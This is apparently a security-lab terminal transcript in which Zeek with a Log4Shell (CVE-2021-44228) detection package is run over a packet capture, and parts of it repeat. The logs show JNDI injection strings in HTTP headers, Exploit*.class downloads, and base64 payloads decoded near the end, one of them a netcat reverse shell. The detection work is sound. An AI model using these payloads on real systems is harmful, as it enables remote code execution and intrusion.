root@thm:~$ cat signatures.log | zeek-cut event_msg
 192.168.56.102: log4j_javaclassname_tcp
 192.168.56.102: log4j_javaclassname_tcp
 192.168.56.102: log4j_javaclassname_tcp

root@thm:~$ cd Desktop/Exercise-Files/log4j
root@thm:~$ ls
 clear-logs.sh  detection-log4j.zeek  log4shell.pcapng
 
root@thm:~$ cat detection-log4j.zeek 
 # Load scan-NG Package!
 @load /opt/zeek/share/zeek/site/cve-2021-44228

root@thm:~$ zeek -C -r log4shell.pcapng detection-log4j.zeek
root@thm:~$ ls
 clear-logs.sh  detection-log4j.zeek  http.log   log4shell.pcapng  packet_filter.log  weird.log
 conn.log       files.log             log4j.log  notice.log        signatures.log

root@thm:~$ head -n 20 http.log
 #fields	ts	uid	id.orig_h	id.orig_p	id.resp_h	id.resp_p	trans_depth	method	host	uri	referrer	version	user_agent	origin	request_body_len	response_body_len	status_code	status_msg	info_code	info_msg	tags	username	password	proxied	orig_fuids	orig_filenames	orig_mime_types	resp_fuids	resp_filenames	resp_mime_types
 #types	time	string	addr	port	addr	port	count	string	string	string	string	string	string	string	count	count	count	string	count	string	set[enum]	string	string	set[string]vector[string]	vector[string]	vector[string]	vector[string]	vector[string]	vector[string]
 1640023505.960608	C46qhk4zZ9Oa6yAoY4	172.17.0.1	60314	172.17.0.2	8080	1	GET	127.0.0.1:8080	/	-	1.1	SecurityNik Testing	-	0	91	400	(empty)	-	-	(empty)	-	-	-	-	-	-	Fq5jbu3EpCk5tV3f18	-	text/json
 1640023652.119439	CFZWci2SfK49pWcMq4	172.17.0.2	51832	192.168.56.102	443	1	GET	192.168.56.102:443	/ExploitQ8v7ygBW4i.class	-	1.1	Java/1.8.0_181	-	0	1216	200	OK	-	-	CVE_2021_44228::LOG4J_RCE	-	-	-	-	-	-	Fm2Pk636DiMArmDn03	-	application/x-java-applet
 1640023652.008511	Ckl0FV3jumRTSjCk37	172.17.0.1	60316	172.17.0.2	8080	1	GET	127.0.0.1:8080	/	-	1.1	SecurityNik Testing	-	0	13	200	(empty)	-	-	CVE_2021_44228::LOG4J_RCE	-	-	-	-	-	-	FZiMgW29483QEvS57h	-	text/plain
 1640025510.063581	CVW1x93htcyS2qlsaf	172.17.0.1	60318	172.17.0.2	8080	1	GET	127.0.0.1:8080	/	-	1.1	SecurityNik Testing	-	0	435	400	(empty)	-	-	(empty)	-	-	-	-	-	-	FQJTPb2FVAOerMJdh7	-	text/html
 1640025554.667458	COvB5D4kdBsF0OAjGg	172.17.0.2	51834	192.168.56.102	443	1	GET	192.168.56.102:443	/ExploitSMMZvT8GXL.class	-	1.1	Java/1.8.0_181	-	0	1221	200	OK	-	-	CVE_2021_44228::LOG4J_RCE	-	-	-	-	-	-	Fz7ckavJbacqKLihd	-	application/x-java-applet
 1640025554.661073	CiHHhm4BncLehOzMN3	172.17.0.1	60320	172.17.0.2	8080	1	GET	127.0.0.1:8080	/	-	1.1	SecurityNik Testing	-	0	13	200	(empty)	-	-	CVE_2021_44228::LOG4J_RCE	-	-	-	-	-	-	FItcX62GLQzrl4Cbzf	-	text/plain
 1640026858.968993	C5kyKu3m6RIbCUqXd9	172.17.0.2	51836	192.168.56.102	443	1	GET	192.168.56.102:443	/Exploit6HHc3BcVzI.class	-	1.1	Java/1.8.0_181	-	0	1236	200	OK	-	-	CVE_2021_44228::LOG4J_RCE	-	-	-	-	-	-	FlPEpD1E3EAvvgGJpj	-	application/x-java-applet
 1640026858.960398	CWFbla33TCz3r1OGOa	172.17.0.1	60324	172.17.0.2	8080	1	GET	127.0.0.1:8080	/	-	1.1	SecurityNik Testing	-	0	13	200	(empty)	-	-	CVE_2021_44228::LOG4J_RCE	-	-	-	-	-	-	Fl61wz3Ge2v4C7LYI4	-	text/plain
 1640027823.052868	C0AIBt146FDQqZgrsc	172.17.0.1	60326	172.17.0.2	8080	1	GET	172.17.0.2:8080	/	-	1.1	Mozilla/5.0 (compatible; Nmap Scripting Engine; https://nmap.org/book/nse.html)	-	0	13	200	(empty)	-	-	CVE_2021_44228::LOG4J_RCE	-	-	-	-	-	-	FRCUNW1if8EiKUkky2	-	text/plain
 1640027823.066566	Ck73J33j2cnDW3d1Le	172.17.0.1	60330	172.17.0.2	8080	1	GET	172.17.0.2:8080	/	-	1.1	${jndi:ldap://127.0.0.1:1389}	-	0	91	400(empty)	-	-	CVE_2021_44228::LOG4J_RCE	-	-	-	-	-	-	FvFr0m3lUQZBzNEDGg	-	text/json
 1640027823.072191	CTHREk1CtzRIg0iWt8	172.17.0.1	60334	172.17.0.2	8080	1	GET	172.17.0.2:8080	/	-	1.1	Mozilla/5.0 (compatible; Nmap Scripting Engine; https://nmap.org/book/nse.html)	-	0	91	400	(empty)	-	-	CVE_2021_44228::LOG4J_RCE	-	-	-	-	-	-	FjiVHw36zI70gLb9wi	-	text/json
 1640027823.077510	CnHDGlNx3DEdaUg6b	172.17.0.1	60338	172.17.0.2	8080	1	GET	172.17.0.2:8080	/	${jndi:ldap://127.0.0.1:1389}	1.1	Mozilla/5.0 (compatible; Nmap Scripting Engine; https://nmap.org/book/nse.html)	-	0	91	400	(empty)	-	-	CVE_2021_44228::LOG4J_RCE	-	-	-	-	-	-	FvR55t24LnhgxI14G3	-	text/json

root@thm:~$ cat http.log | zeek-cut user_agent
 Mozilla/5.0 (compatible; Nmap Scripting Engine; https://nmap.org/book/nse.html)
 Mozilla/5.0 (compatible; Nmap Scripting Engine; https://nmap.org/book/nse.html)

root@thm:~$ cd Desktop/Exercise-Files/log4j
root@thm:~$ ls
 clear-logs.sh  detection-log4j.zeek  log4shell.pcapng
 
root@thm:~$ cat detection-log4j.zeek 
 # Load scan-NG Package!
 @load /opt/zeek/share/zeek/site/cve-2021-44228

root@thm:~$ zeek -C -r log4shell.pcapng detection-log4j.zeek
root@thm:~$ ls
 clear-logs.sh  detection-log4j.zeek  http.log   log4shell.pcapng  packet_filter.log  weird.log
 conn.log       files.log             log4j.log  notice.log        signatures.log

root@thm:~$ head -n 20 http.log
 #fields	ts	uid	id.orig_h	id.orig_p	id.resp_h	id.resp_p	trans_depth	method	host	uri	referrer	version	user_agent	origin	request_body_len	response_body_len	status_code	status_msg	info_code	info_msg	tags	username	password	proxied	orig_fuids	orig_filenames	orig_mime_types	resp_fuids	resp_filenames	resp_mime_types
 #types	time	string	addr	port	addr	port	count	string	string	string	string	string	string	string	count	count	count	string	count	string	set[enum]	string	string	set[string]vector[string]	vector[string]	vector[string]	vector[string]	vector[string]	vector[string]
 1640023505.960608	C46qhk4zZ9Oa6yAoY4	172.17.0.1	60314	172.17.0.2	8080	1	GET	127.0.0.1:8080	/	-	1.1	SecurityNik Testing	-	0	91	400	(empty)	-	-	(empty)	-	-	-	-	-	-	Fq5jbu3EpCk5tV3f18	-	text/json
 1640023652.119439	CFZWci2SfK49pWcMq4	172.17.0.2	51832	192.168.56.102	443	1	GET	192.168.56.102:443	/ExploitQ8v7ygBW4i.class	-	1.1	Java/1.8.0_181	-	0	1216	200	OK	-	-	CVE_2021_44228::LOG4J_RCE	-	-	-	-	-	-	Fm2Pk636DiMArmDn03	-	application/x-java-applet
 1640023652.008511	Ckl0FV3jumRTSjCk37	172.17.0.1	60316	172.17.0.2	8080	1	GET	127.0.0.1:8080	/	-	1.1	SecurityNik Testing	-	0	13	200	(empty)	-	-	CVE_2021_44228::LOG4J_RCE	-	-	-	-	-	-	FZiMgW29483QEvS57h	-	text/plain
 1640025510.063581	CVW1x93htcyS2qlsaf	172.17.0.1	60318	172.17.0.2	8080	1	GET	127.0.0.1:8080	/	-	1.1	SecurityNik Testing	-	0	435	400	(empty)	-	-	(empty)	-	-	-	-	-	-	FQJTPb2FVAOerMJdh7	-	text/html
 1640025554.667458	COvB5D4kdBsF0OAjGg	172.17.0.2	51834	192.168.56.102	443	1	GET	192.168.56.102:443	/ExploitSMMZvT8GXL.class	-	1.1	Java/1.8.0_181	-	0	1221	200	OK	-	-	CVE_2021_44228::LOG4J_RCE	-	-	-	-	-	-	Fz7ckavJbacqKLihd	-	application/x-java-applet
 1640025554.661073	CiHHhm4BncLehOzMN3	172.17.0.1	60320	172.17.0.2	8080	1	GET	127.0.0.1:8080	/	-	1.1	SecurityNik Testing	-	0	13	200	(empty)	-	-	CVE_2021_44228::LOG4J_RCE	-	-	-	-	-	-	FItcX62GLQzrl4Cbzf	-	text/plain
 1640026858.968993	C5kyKu3m6RIbCUqXd9	172.17.0.2	51836	192.168.56.102	443	1	GET	192.168.56.102:443	/Exploit6HHc3BcVzI.class	-	1.1	Java/1.8.0_181	-	0	1236	200	OK	-	-	CVE_2021_44228::LOG4J_RCE	-	-	-	-	-	-	FlPEpD1E3EAvvgGJpj	-	application/x-java-applet
 1640026858.960398	CWFbla33TCz3r1OGOa	172.17.0.1	60324	172.17.0.2	8080	1	GET	127.0.0.1:8080	/	-	1.1	SecurityNik Testing	-	0	13	200	(empty)	-	-	CVE_2021_44228::LOG4J_RCE	-	-	-	-	-	-	Fl61wz3Ge2v4C7LYI4	-	text/plain
 1640027823.052868	C0AIBt146FDQqZgrsc	172.17.0.1	60326	172.17.0.2	8080	1	GET	172.17.0.2:8080	/	-	1.1	Mozilla/5.0 (compatible; Nmap Scripting Engine; https://nmap.org/book/nse.html)	-	0	13	200	(empty)	-	-	CVE_2021_44228::LOG4J_RCE	-	-	-	-	-	-	FRCUNW1if8EiKUkky2	-	text/plain
 1640027823.066566	Ck73J33j2cnDW3d1Le	172.17.0.1	60330	172.17.0.2	8080	1	GET	172.17.0.2:8080	/	-	1.1	${jndi:ldap://127.0.0.1:1389}	-	0	91	400(empty)	-	-	CVE_2021_44228::LOG4J_RCE	-	-	-	-	-	-	FvFr0m3lUQZBzNEDGg	-	text/json
 1640027823.072191	CTHREk1CtzRIg0iWt8	172.17.0.1	60334	172.17.0.2	8080	1	GET	172.17.0.2:8080	/	-	1.1	Mozilla/5.0 (compatible; Nmap Scripting Engine; https://nmap.org/book/nse.html)	-	0	91	400	(empty)	-	-	CVE_2021_44228::LOG4J_RCE	-	-	-	-	-	-	FjiVHw36zI70gLb9wi	-	text/json
 1640027823.077510	CnHDGlNx3DEdaUg6b	172.17.0.1	60338	172.17.0.2	8080	1	GET	172.17.0.2:8080	/	${jndi:ldap://127.0.0.1:1389}	1.1	Mozilla/5.0 (compatible; Nmap Scripting Engine; https://nmap.org/book/nse.html)	-	0	91	400	(empty)	-	-	CVE_2021_44228::LOG4J_RCE	-	-	-	-	-	-	FvR55t24LnhgxI14G3	-	text/json

root@thm:~$ cat http.log | zeek-cut uri | sort | uniq
 /
 /Exploit6HHc3BcVzI.class
 /ExploitQ8v7ygBW4i.class
 /ExploitSMMZvT8GXL.class
 /testing1
 /testing123
 testing1

root@thm:~$ cd Desktop/Exercise-Files/log4j
root@thm:~$ ls
 clear-logs.sh  detection-log4j.zeek  log4shell.pcapng
 
root@thm:~$ cat detection-log4j.zeek 
 # Load scan-NG Package!
 @load /opt/zeek/share/zeek/site/cve-2021-44228

root@thm:~$ zeek -C -r log4shell.pcapng detection-log4j.zeek
root@thm:~$ ls
 clear-logs.sh  detection-log4j.zeek  http.log   log4shell.pcapng  packet_filter.log  weird.log
 conn.log       files.log             log4j.log  notice.log        signatures.log

root@thm:~$ head -n 20 log4j.log
 #fields	ts	uid	http_uri	uri	stem	target_host	target_port	method	is_orig	name	value	matched_name	matched_value
 #types	time	string	string	string	string	string	string	string	bool	string	string	bool	bool
 1640023652.008511	Ckl0FV3jumRTSjCk37	/	192.168.56.102:389/Basic/Command/Base64/dG91Y2ggL3RtcC9wd25lZAo=	192.168.56.102:389	192.168.56.102	389	GET	T	X-API-VERSION	${jndi:ldap://192.168.56.102:389/Basic/Command/Base64/dG91Y2ggL3RtcC9wd25lZAo=}	F	T
 1640025554.661073	CiHHhm4BncLehOzMN3	/	192.168.56.102:389/Basic/Command/Base64/d2hpY2ggbmMgPiAvdG1wL3B3bmVkCg==	192.168.56.102:389	192.168.56.102	389	GET	T	X-API-VERSION	${jndi:ldap://192.168.56.102:389/Basic/Command/Base64/d2hpY2ggbmMgPiAvdG1wL3B3bmVkCg==}	F	T
 1640026858.960398	CWFbla33TCz3r1OGOa	/	192.168.56.102:389/Basic/Command/Base64/bmMgMTkyLjE2OC41Ni4xMDIgODAgLWUgL2Jpbi9zaCAtdnZ2Cg==	192.168.56.102:389	192.168.56.102	389	GET	T	X-API-VERSION	${jndi:ldap://192.168.56.102:389/Basic/Command/Base64/bmMgMTkyLjE2OC41Ni4xMDIgODAgLWUgL2Jpbi9zaCAtdnZ2Cg==}	F	T
 1640027823.052868	C0AIBt146FDQqZgrsc	/	127.0.0.1:1389	127.0.0.1:1389	127.0.0.1	1389	GET	T	X-API-VERSION	${jndi:ldap://127.0.0.1:1389}	F	T
 1640027823.066566	Ck73J33j2cnDW3d1Le	/	127.0.0.1:1389	127.0.0.1:1389	127.0.0.1	1389	GET	T	USER-AGENT	${jndi:ldap://127.0.0.1:1389}	F	T
 1640027823.072191	CTHREk1CtzRIg0iWt8	/	127.0.0.1:1389	127.0.0.1:1389	127.0.0.1	1389	GET	T	COOKIE	${jndi:ldap://127.0.0.1:1389}	F	T
 1640027823.077510	CnHDGlNx3DEdaUg6b	/	127.0.0.1:1389	127.0.0.1:1389	127.0.0.1	1389	GET	T	REFERER	${jndi:ldap://127.0.0.1:1389}	F	T
 1640027823.089508	CHEJYb2xPpVeg4qKL6	/	127.0.0.1:1389	127.0.0.1:1389	127.0.0.1	1389	GET	T	ACCEPT-LANGUAGE	${jndi:ldap://127.0.0.1:1389}	F	T
 1640027823.094029	CNQqim3QxR3vjdrRsb	/	127.0.0.1:1389	127.0.0.1:1389	127.0.0.1	1389	GET	T	ACCEPT-ENCODING	${jndi:ldap://127.0.0.1:1389}	F	T
 1640027823.095902	ChqYJG3NwzJd7ncOf8	/	127.0.0.1:1389	127.0.0.1:1389	127.0.0.1	1389	GET	T	UPGRADE-INSECURE-REQUESTS	${jndi:ldap://127.0.0.1:1389}	F	T
 1640027823.097732	CJGWVF4QqmB0rLjJn9	/	127.0.0.1:1389	127.0.0.1:1389	127.0.0.1	1389	GET	T	ACCEPT	${jndi:ldap://127.0.0.1:1389}	F	T
 1640027823.099709	C2eIJ04Slboqx3m8e2	/	127.0.0.1:1389	127.0.0.1:1389	127.0.0.1	1389	GET	T	UPGRADE-INSECURE-REQUESTS	${jndi:ldap://127.0.0.1:1389}	F	T

root@thm:~$ cat log4j.log | zeek-cut uri | sort | uniq
 127.0.0.1:1389
 192.168.56.102
 192.168.56.102:389
 192.168.56.102:389/Basic/Command/Base64/bmMgMTkyLjE2OC41Ni4xMDIgODAgLWUgL2Jpbi9zaCAtdnZ2Cg==
 192.168.56.102:389/Basic/Command/Base64/d2hpY2ggbmMgPiAvdG1wL3B3bmVkCg==
 192.168.56.102:389/Basic/Command/Base64/dG91Y2ggL3RtcC9wd25lZAo=
 192.168.56.102:389/test

root@thm:~$ echo -n "bmMgMTkyLjE2OC41Ni4xMDIgODAgLWUgL2Jpbi9zaCAtdnZ2Cg==" | base64 -d
 nc 192.168.56.102 80 -e /bin/sh -vvv
root@thm:~$ echo -n "d2hpY2ggbmMgPiAvdG1wL3B3bmVkCg==" | base64 -d
 which nc > /tmp/pwned
root@thm:~$ echo -n "dG91Y2ggL3RtcC9wd25lZAo=" | base64 -d
 touch /tmp/pwned